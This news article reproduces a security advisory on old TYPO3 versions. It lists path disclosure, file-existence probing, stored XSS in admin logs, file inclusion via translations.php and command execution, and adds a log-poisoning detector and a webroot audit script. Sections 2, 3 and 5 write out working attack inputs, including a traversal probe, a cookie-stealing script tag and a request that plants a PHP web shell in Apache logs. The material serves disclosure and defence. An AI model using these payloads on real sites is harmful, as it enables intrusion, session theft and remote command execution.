Old TYPO3 versions insecure


The TYPO3 Association had already indicated at the end of last year that older versions of TYPO3 are insecure. However, the specific vulnerabilities and risks were never clearly disclosed. TYPOTycoon went to investigate.


All versions of TYPO3 up to and including v3.8.0 are insecure


Many sites still run TYPO3 versions older than 3.8.0. A survey of websites worldwide taught us that there is even a large number of TYPO3 3.5 installations out there. The so-called TYPO3 vulnerabilities report shows minor to severe leaks in various areas. Some of them are relatively easy to fix at the server level. Others, however, really do require the upgrade.


Below is an overview of these vulnerabilities as described on Xatrix.com.


0) CLIENT-SIDE DATA-OBFUSCATION

form-fields are obfuscated using client-side java-script routines.
after the fields are joined a java-script creates MD5-hashes and
submits the form.

examples: index.php (account-data), showpic.php(name-checksum)

attached perl-scripts (typo.pl/showpic.pl) demonstrate how to circumvent
this protection.


1) PATH-DISCLOSURE

several test-, class- and library-scripts can be found within webroot.
some of them can be forced to produce runtime errors and output their
physical path.

example: /fileadmin/include_test.php


2) PROOF OF FILE-EXISTENCE

"showpic.php" and "thumbs.php" allow an attacker to check the existence of
arbitrary files.

combined with file-enumeration methods it is possible to reconstruct parts
of the directory- and filesystem - structure.

example on how to check for existing files with attached perl-script "showpic.pl":
---*---
sh> showpic.pl localhost '../../../../../../../../../../etc/hosts'
../../../../../../../../../../etc/hosts exists
---*---


3) CROSS SITE SCRIPTING / COOKIE-THEFT

all system and login-errors are saved in the typo3-database.
administrators can view all the erroneous data.

since this data is not being checked for XSS-content it is possible to include
client-side script(java-script)-tags in these entries.

every time the admins view their logs these scripts will be run on the admins
web-browser which leads to a typical XSS-bug.

thus making it possible to steal the admins-cookies or let him open a new
user-account without his knowledge.


example with the attached "typo.pl" - perlscript:

---*---
sh> typo.pl localhost '><script>alert(document.cookie)</script><:aaa'
---*---

viewing the logfiles will execute the script.


4) ARBITRARY FILE-RETRIEVAL

the "dev/translations.php" - script does not check the
ONLY-parameter for malicious values.

a relative path combined with a Nullbyte lead to the inclusion of the
given file.

example http-request:
---*---
GET host/dev/translations.php
---*---


5) ARBITRARY COMMAND EXECUTION

extends vulnerability number 4):

if the included file contains php-source code it will be executed.
thus allowing an attacker to execute operating-system commands and
at long sight escalate his privileges.

example:
---*---

a file for placing our malicious php-source is needed.
if there is no file we have write-access to we can still use the webserver's logfiles.

the following http-request:
---cut---
localhost/<%3f %60echo %27<%3fpassthru(%5c%24c)%3f>%27 >> ./x.php%60 %3f>
---cut---

creates this entry:

---cut---
[Tue Jan 14 19:42:53 2003] [error] [client 127.0.0.1] File does not exist: /apachepath/apache/htdocs/<? `echo '<?passthru($c
)?>' >> ./x.php` ?>
---cut---

in a typical apache error_log file.

using the method discussed under 4) the following http-request:

---cut---
localhost/typo3/typo3/dev/translations.php'
---cut---

will include the apache error_log in our output and execute our php-commands.
as a result we will find x.php in our "/dev" directory.

x.php:
---cut---
<?passthru($c)?>
---cut---

---*---
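The log-poisoning step in 5) leaves a trace in the Apache error_log itself: a request path carrying PHP tags. The following detector is an added example, not part of the Xatrix advisory or of TYPO3; it parses standard Apache error_log lines and reports entries whose message contains a PHP open or close tag. The log lines it runs on are constructed for the example.

```python
import re
from dataclasses import dataclass

# Apache error_log line layout: [timestamp] [level] [client ip] message
# (the [client ...] part is absent on server notices).
APACHE_ERR_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<level>[^\]]+)\] "
    r"(?:\[client (?P<client>[^\]]+)\] )?(?P<msg>.*)$"
)
# Any PHP open tag, short tags included (they were on by default on the
# PHP versions of that era), except '<?xml', plus any PHP close tag.
# A legitimate request path should contain neither.
PHP_TAG_RE = re.compile(r"<\?(?!xml)|\?>")


@dataclass
class Finding:
    ts: str
    client: str
    msg: str


def find_poisoned_entries(lines):
    """Return error_log entries whose message carries PHP tags.

    Entries are checked line by line; a payload that wraps onto a
    continuation line (as in the advisory's example) is still caught
    on its first line, which holds the '[client ...]' prefix and the
    opening tag.
    """
    hits = []
    for line in lines:
        m = APACHE_ERR_RE.match(line)
        if m and PHP_TAG_RE.search(m.group("msg")):
            hits.append(Finding(m.group("ts"), m.group("client") or "-", m.group("msg")))
    return hits


# Constructed sample log (not from a real server); only the second line is hostile.
SAMPLE_LOG = [
    "[Tue Jan 14 19:40:01 2003] [error] [client 192.0.2.10] File does not exist: /var/www/htdocs/favicon.ico",
    "[Tue Jan 14 19:42:53 2003] [error] [client 192.0.2.10] File does not exist: /var/www/htdocs/<?php echo 1 ?>",
    "[Tue Jan 14 19:43:10 2003] [notice] Apache/1.3.27 (Unix) configured -- resuming normal operations",
]

if __name__ == "__main__":
    for f in find_poisoned_entries(SAMPLE_LOG):
        print(f"{f.ts}  client={f.client}  {f.msg}")
```

Run it over a real error_log with `find_poisoned_entries(open(path))`; a hit means someone has tried to plant PHP in the log, which only matters if a script like dev/translations.php can be made to include that file.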


6) SCRIPTS AND DIRECTORIES IN WEBROOT

a couple of scripts, libraries, files and directories can be found within typo3s
webroot.

"/install" is improperly protected and vulnerable to brute-force attacks.
"/fileadmin" directory reveals log-files and demo-scripts
"/typo3conf" directory contains the localconf.php,database.sql and other sensitive files


=======
Remarks
=======

the serious vulnerabilities rely on the "/dev" (developer?) - directory.
scripts within this directory can be found in many/most production-environments!


====================
Recommended Hotfixes
====================
overall) install the new Version !

or

1) remove "/install" directory
2) remove "/dev" directory
3) Choose strong administrator-passwords
4) showpic.php and thumbs.php must be patched.
5) remove all demo-directories and protect "/fileadmin" and "/typo3conf"
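Hotfixes 1, 2 and 5 can be checked mechanically. The audit below is an added example, not a TYPO3 or Xatrix tool; it walks a document root and reports the items the advisory asks to remove or protect. The directory names are taken from the advisory; the assumption that "protected" means an Apache `.htaccess` in the directory is mine, as is the sample tree it builds for the demonstration.

```python
import tempfile
from pathlib import Path

# Relative to the TYPO3 document root, as named in the advisory.
REMOVE_DIRS = ["install", "dev"]                       # hotfixes 1 and 2
DEMO_FILES = ["fileadmin/include_test.php"]            # example under 1)
PROTECT_DIRS = ["fileadmin", "typo3conf"]              # hotfix 5
SENSITIVE = ["typo3conf/localconf.php", "typo3conf/database.sql"]  # item 6)


def audit_webroot(root):
    """Return (code, relative path) findings for a TYPO3 document root."""
    root = Path(root)
    findings = []
    for d in REMOVE_DIRS:
        if (root / d).is_dir():
            findings.append(("remove-dir", d))
    for f in DEMO_FILES:
        if (root / f).is_file():
            findings.append(("demo-script", f))
    for d in PROTECT_DIRS:
        # Assumption: access control is an Apache .htaccess inside the
        # directory; without one the directory is served as-is.
        if (root / d).is_dir() and not (root / d / ".htaccess").is_file():
            findings.append(("unprotected-dir", d))
    for f in SENSITIVE:
        if (root / f).is_file():
            findings.append(("sensitive-file", f))
    return findings


def build_sample_webroot(protected=False):
    """Constructed sample: an old-style TYPO3 tree with the issues present.

    With protected=True a deny-all .htaccess is written into fileadmin and
    typo3conf, so only the remove/demo/sensitive findings remain.
    """
    root = Path(tempfile.mkdtemp(prefix="typo3-audit-"))
    for d in ("install", "dev", "fileadmin", "typo3conf"):
        (root / d).mkdir()
    (root / "dev" / "translations.php").write_text("<?php // demo ?>\n")
    (root / "fileadmin" / "include_test.php").write_text("<?php // demo ?>\n")
    (root / "typo3conf" / "localconf.php").write_text("<?php $TYPO3_CONF_VARS = array(); ?>\n")
    if protected:
        for d in PROTECT_DIRS:
            (root / d / ".htaccess").write_text("Order deny,allow\nDeny from all\n")
    return root


if __name__ == "__main__":
    for code, path in audit_webroot(build_sample_webroot()):
        print(f"{code:16} {path}")
```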

Related news:


TYPO3 version 4.0.5 released
Security: Tip-a-Friend TYPO3 extension
Security: Richtext Editor
Security update TYPO3-20060512-1: dam_downloads
Security Bulletin TYPO3-20061010-1: fe_adminLib.inc